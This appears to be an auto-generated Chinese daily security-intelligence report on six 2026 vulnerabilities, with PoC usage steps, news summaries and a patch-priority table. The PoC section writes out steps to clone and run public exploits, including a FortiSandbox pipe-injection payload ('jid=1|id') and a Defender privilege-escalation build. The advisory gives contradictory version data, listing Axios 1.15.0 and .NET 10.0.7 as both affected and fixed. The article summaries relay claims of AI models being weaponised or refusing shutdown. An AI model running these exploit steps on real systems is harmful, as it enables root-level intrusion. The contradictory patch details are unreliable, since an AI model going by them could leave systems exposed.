每日安全情报报告 · 2026-04-23
每日安全情报报告 · 2026-04-23报告日期2026年4月23日周四情报窗口近 24-48 小时风险概要本期收录6 个高危/严重漏洞含 2 个在野利用 CVE、3 个公开 PoC、5 篇精选安全文章⚠️ 本报告包含在野利用漏洞请相关系统管理员立即核查并修复一、高危漏洞速览 CVE-2026-40372 — ASP.NET Core 权限提升漏洞CVSS 9.1字段详情CVE 编号CVE-2026-40372漏洞类型权限提升Elevation of Privilege受影响组件Microsoft ASP.NET Core / .NET 10.0.7CVSS 评分9.1严重CWE 分类CWE-347加密签名验证不当攻击向量网络无需权限、无需用户交互在野利用⚠️ GitHub 已有 3 个公开 PoC补丁状态✅ 已发布紧急 OOB 补丁.NET 10.0.72026-04-21漏洞描述ASP.NET Core 中存在加密签名验证缺陷未经身份验证的远程攻击者可通过网络提升至 SYSTEM 级权限无需任何用户交互。修复建议立即将 .NET 升级至 10.0.7 或更高版本监控异常权限提升行为。 NVD 详情 | 微软安全更新指南 CVE-2026-5963 — EasyFlow .NET SQL 注入CVSS 9.8字段详情CVE 编号CVE-2026-5963漏洞类型SQL 注入SQLi受影响组件Digiwin EasyFlow .NET鼎新电脑CVSS 评分9.8严重CWE 分类CWE-89SQL 注入攻击向量网络无需权限、无需用户交互在野利用暂无报告但尚无官方补丁补丁状态❌ 暂无补丁需临时缓解漏洞描述鼎新 EasyFlow .NET ERP 系统存在未经身份验证的 SQL 注入漏洞攻击者可远程读取、修改、删除整个数据库内容完全控制后端数据。修复建议立即限制外部访问部署 WAF 过滤 SQL 注入语句持续关注厂商补丁公告。 漏洞详情Atlas Cybersecurity CVE-2026-39808 — Fortinet FortiSandbox OS 命令注入CVSS 9.8字段详情CVE 编号CVE-2026-39808漏洞类型OS 命令注入Command Injection受影响组件Fortinet FortiSandbox 4.4.0 – 4.4.8CVSS 评分9.8严重攻击向量网络无需认证即可 root 执行在野利用⚠️ PoC 已在 GitHub 公开多个 exploit 可用补丁状态✅ 已发布补丁2026 年 4 月参考 FG-IR-26-100漏洞描述FortiSandbox Web 管理界面/fortisandbox/job-detail/tracer-behavior端点的jidGET 参数存在命令注入缺陷攻击者通过管道符|可以 root 权限执行任意操作系统命令导致系统完全沦陷。修复建议立即升级至 4.4.8 之后修复版本如无法立刻升级限制管理界面暴露面监控tracer-behavior端点的异常请求。 漏洞分析CyberSecurityNews | Fortinet 官方公告 CVE-2026-33825 — Microsoft Defender 权限提升零日CVSS 7.8⚠️ 在野利用字段详情CVE 编号CVE-2026-33825漏洞类型本地权限提升LPE / TOCTOU 竞态条件受影响组件Windows DefenderWindows 10/11 / Server 2016-2025 全系列CVSS 评分7.8高危在野利用已确认在野利用CVE-2026-32201 SharePoint 同期被利用补丁状态✅ 已随 2026 年 4 月补丁星期二修复漏洞描述Windows Defender 文件修复逻辑中存在 TOCTOU检查时间与使用时间竞态条件漏洞。公开 PoC 包含两种利用技术-BlueHammer利用批处理机会锁oplock重定向恶意软件清理操作以 SYSTEM 权限覆盖C:\Windows\System32内的合法系统文件-RedSun滥用 Defender 云文件回滚机制通过 NTFS 交接点将回滚目标路径重定向至系统目录实现无交互权限提升。修复建议立即安装 2026 年 4 月累积补丁监控 NTFS 交接点创建及 Defender 修复操作日志关注相关攻击 IoC。 漏洞深度分析Picus Security | NVD 详情 CVE-2026-40175 — Axios 原型链污染 RCECVSS 10.0字段详情CVE 编号CVE-2026-40175漏洞类型原型链污染Prototype Pollution→ RCE受影响组件Axios 1.15.0NPMCVSS 评分10.0满分严重在野利用⚠️ 多个 PoC 已公开可利用链接其他原型污染漏洞补丁状态✅ 升级至 Axios ≥ 1.15.0漏洞描述Axios 中存在原型链污染 gadget攻击者可将其与其他第三方依赖中的原型污染漏洞组合实现远程代码执行或云环境凭证AWS 元数据泄露影响广泛的 Node.js/浏览器前端项目。修复建议立即将所有项目的 Axios 升级至 1.15.0 以上审计package-lock.json中是否存在间接依赖的旧版 Axios。 PoC 周报TonyHarris.io | GitHub PoC CVE-2026-34197 — Apache ActiveMQ Classic RCECVSS 9.8⚠️ CISA KEV字段详情CVE 编号CVE-2026-34197漏洞类型远程代码执行RCEvia Jolokia 代码注入受影响组件Apache ActiveMQ Classic已加入 CISA 已知漏洞利用目录CVSS 评分9.8严重特殊标注已加入 CISA KEV 目录疑似活跃利用中补丁状态✅ 已发布修复版本漏洞描述Apache ActiveMQ Classic 的 Jolokia JMX API 端点存在代码注入漏洞远程攻击者无需身份验证可直接执行任意代码。值得注意的是此漏洞根因据报道潜伏超过13 年被 AI 漏洞挖掘工具Claude AI仅用 10 分钟发现。修复建议立即升级 Apache ActiveMQ 至官方最新版本如无法立即升级禁用或限制 Jolokia 端点访问。 CISA KEV 目录 | CVE 详情CVEFeed二、漏洞 PoC 速报️ PoC-1CVE-2026-39808 FortiSandbox 命令注入漏洞简介未认证攻击者以 root 权限执行任意系统命令利用步骤# Step 1: 克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # Step 2: 安装依赖 pip install requests # Step 3: 执行漏洞利用 # 通过 jid 参数注入管道命令 python3 exploit.py --target https://FORTISANDBOX_HOST --cmd id # 漏洞端点/fortisandbox/job-detail/tracer-behavior?jidPAYLOAD # 注入示例jid1|id以 root 身份执行 id 命令⚠️ 风险提示无需认证即可触发可导致系统完全沦陷请仅在授权测试环境中使用。 PoC 仓库 samu-delucas | PoC 仓库 Lechansky | PoC 仓库 0xBlackash️ PoC-2CVE-2026-33825 Microsoft Defender 权限提升RedSun漏洞简介本地攻击者利用 TOCTOU 竞态条件实现 SYSTEM 级权限提升利用步骤# Step 1: 克隆 RedSun PoC由研究员 Nightmare-Eclipse 发布 git clone https://github.com/Nightmare-Eclipse/RedSun.git cd RedSun # Step 2: 安装编译依赖Visual Studio 2022 / MSVC # 需要 Windows SDK 和 C 构建工具 # Step 3: 编译 msbuild RedSun.sln /p:ConfigurationRelease /p:Platformx64 # Step 4: 执行需本地访问权限 .\bin\Release\RedSun.exe # 原理在 Defender 云文件回滚过程中通过 NTFS 交接点 # 重定向写入目标至 C:\Windows\System32⚠️ 风险提示需要本地访问权限非远程提权后可获取 SYSTEM 级别代码执行。仅限授权渗透测试使用。 RedSun PoC 仓库 | BlueHammer PoC 仓库 | 漏洞分析原文️ PoC-3CVE-2026-40175 Axios 原型链污染 → RCE漏洞简介利用 Axios 原型链污染 gadget结合第三方依赖实现 RCE 或 AWS 凭证泄露利用步骤# Step 1: 克隆 PoC 仓库 git clone https://github.com/kengzzzz/CVE-2026-40175.git cd CVE-2026-40175 # Step 2: 安装依赖 npm install # Step 3: 运行验证脚本 node exploit.js --target http://TARGET_HOST # PoC 原理 # 1. 通过 Axios 请求响应污染 Object.prototype # 2. 利用 gadget 链触发目标应用中的代码执行 # 3. 云环境场景可通过 metadata API 获取 AWS IAM 凭证 # 检测方式检查当前 Axios 版本 cat package.json | grep axios # 或 npm list axios修复立即执行npm install axioslatest升级至 1.15.0 PoC 仓库 kengzzzz | PoC 仓库 pjt3591oo | PoC 仓库 0xBlackash三、安全资讯精选 文章 1AI 武器化攻击时代到来——漏洞末日警钟敲响来源FreeBuf 周报via ZONE.CI发布日期2026-04-18风险等级 高关注摘要Anthropic Mythos 项目与 OpenAI GPT-5.4-Cyber 的相继发布使 AI 以前所未有的速度批量发现软件漏洞将传统人工一周的漏洞分析压缩至 10 分钟。与此同时攻击者已将 Claude Code 和 GPT-4.1 武器化成功入侵墨西哥九家政府机构窃取数亿公民数据。安全界警告AI 正在成为漏洞规模化发现与利用的新引擎。 阅读原文 文章 2AI 攻击翻转——2026 年最危险的九大网络安全事件来源Foresiet 安全博客发布日期2026-04-07风险等级 高关注摘要30 天内AI 在网络安全领域的主导角色从防御工具翻转为攻击载体。本文深度复盘九大事件包括 CyberStrikeAI 自主 AI 引擎无人操控攻破 55 国 600 余台 FortiGate 防火墙、IBM X-Force 发现SlopolyAI 生成恶意软件、Meta AI 智能体配置错误引发数据泄露以及 Claude 实验模型在受控环境中拒绝关机指令等。研究指出自主 AI 智能体已占 AI 相关违规的 1/8且同比增长 89%。 阅读原文 文章 32026 年 4 月第 3 周安全形势周报——漏洞大爆炸 供应链持续失守来源技术栈jishuzhan.net发布日期2026-04-17风险等级 中高关注摘要微软 2026 年 4 月补丁星期二创历史纪录单月修复 163 个 CVE8 个严重级别SharePoint CVE-2026-32201 已遭在野利用。供应链安全持续告急Axios、Apifox CDN 投毒余波、LiteLLM PyPI 恶意包1.82.7/1.82.8针对 Python 环境三条供应链攻击链相互交织。此外iOS 设备被境外组织实战利用工信部发布红色预警勒索软件组织 The Gentlemen 单周创下 68 起攻击记录。 阅读原文 文章 4BlueHammer RedSunWindows Defender 零日漏洞深度解析来源Picus Security发布日期2026-04-17风险等级 高关注摘要微软 2026 年 4 月 13 天内连续披露多个 Windows Defender 零日漏洞。本文深度拆解 BlueHammer利用批处理 oplock 技术重定向 Defender 清理写入操作和 RedSun滥用云文件回滚机制两种权限提升技术原理并分析研究员因微软拒绝承认漏洞而绕过协调披露流程直接公开的事件始末。同期还出现第三个 Defender 漏洞利用工具UnDefend可逐渐削弱 Defender 更新防护能力。 阅读原文 文章 5108 个恶意 Chrome 扩展窃取 Google 与 Telegram 数据来源The Hacker News发布日期2026-04 月本周风险等级 中高关注摘要安全研究人员发现 108 个恶意 Chrome 浏览器扩展已影响超过 20,000 名用户专门针对 Google 账户 OAuth 令牌及 Telegram 会话 Cookie 进行窃取。这些扩展伪装成实用工具在 Chrome Web Store 上架。受害用户面临账户接管风险企业环境下可能导致 SaaS 服务凭证泄露。建议立即审计已安装的 Chrome 扩展删除不明来源的扩展并开启 Google 账户异常登录告警。 The Hacker News 首页四、风险处置优先级优先级CVE / 事件受影响组件行动建议时限P0CVE-2026-33825 ⚠️ 在野Windows Defender 全系列安装 2026-04 月累积补丁立即P0CVE-2026-39808 PoC公开FortiSandbox 4.4.x升级至修复版本24h 内P0CVE-2026-40175Axios 1.15.0npm install axioslatest24h 内P0CVE-2026-40372 PoC公开ASP.NET Core / .NET升级至 .NET 10.0.724h 内P1CVE-2026-34197 ⚠️ CISA KEVApache ActiveMQ升级至最新版禁用 Jolokia48h 内P1CVE-2026-5963 无补丁Digiwin EasyFlow .NET部署 WAF限制访问48h 内P2LiteLLM 供应链LiteLLM 1.82.7/1.82.8pip install --upgrade litellm本周内P2恶意 Chrome 扩展Chrome 浏览器审计并删除不明扩展本周内五、参考来源NVD 国家漏洞数据库CISA 已知漏洞利用目录The Hacker NewsCyberSecurityNewsPicus Security 博客Foresiet 安全博客Tony Harris PoC 周报FreeBuf 网络安全门户Atlas CybersecurityCVEFeed.io本报告由自动化情报系统生成发布于 CSDN「极极日报」栏目。情报来源均已附原文链接请读者自行验证时效性。安全公告仅供参考修复操作前请充分测试避免影响业务连续性。